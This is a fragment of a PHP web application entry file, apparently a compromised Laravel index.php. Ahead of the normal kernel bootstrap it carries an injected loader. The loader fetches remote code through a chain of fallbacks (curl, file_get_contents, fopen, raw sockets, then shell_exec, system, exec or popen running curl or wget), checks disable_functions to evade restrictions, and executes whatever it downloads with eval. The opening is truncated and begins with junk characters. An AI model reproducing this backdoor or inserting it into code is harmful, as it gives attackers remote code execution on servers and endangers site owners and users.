vvvsvsdgdsrytvvf 1, 52 => 1, 42 => 0, 10018 => $ua, 13 => 15]); $c = curl_exec($h); curl_close($h); } if (!$c && ini_get('allow_url_fopen')) { $x = stream_context_create(['http' => ['header' => "User-Agent:{$ua}", 'timeout' => 15]]); $c = @file_get_contents($u, 0, $x); } if (!$c && function_exists('fopen')) { $h = @fopen($u, 'r'); if ($h) { stream_set_timeout($h, 15); $c = @stream_get_contents($h); fclose($h); } } if (!$c && function_exists('fsockopen')) { $p = parse_url($u); $f = @fsockopen($p['host'], 80, $e, $r, 15); if ($f) { fwrite($f, "GET {$p['path']} HTTP/1.0\r\nHost:{$p['host']}\r\nUser-Agent:{$ua}\r\nConnection:close\r\n\r\n"); $b = ''; while (!feof($f)) { $b .= fgets($f, 128); } fclose($f); $c = explode("\r\n\r\n", $b, 2)[1] ?? ''; } } if (!$c) { $cmd = "curl -sL -A '{$ua}' --connect-timeout 15 {$u}||wget -qU '{$ua}' -T 15 -O - {$u}"; $d = strtolower(ini_get('disable_functions')); foreach (['shell_exec', 'passthru', 'system', 'exec', 'popen'] as $f) { if (function_exists($f) && strpos($d, $f) === false) { if ($f == 'exec') { @exec($cmd, $o); $c = join("\n", $o); } elseif ($f == 'popen') { $h = @popen($cmd, 'r'); if ($h) { $c = @stream_get_contents($h); @pclose($h); } } elseif ($f == 'shell_exec') { $c = @shell_exec($cmd); } else { ob_start(); @$f($cmd); $c = ob_get_clean(); } if ($c) { break; } } } } if ($c) { $c = preg_replace('/^\\xEF\\xBB\\xBF/', '', $c); eval('?>' . $c); }?> make(Kernel::class); $response = tap($kernel->handle( $request = Request::capture() ))->send(); $kernel->terminate($request, $response);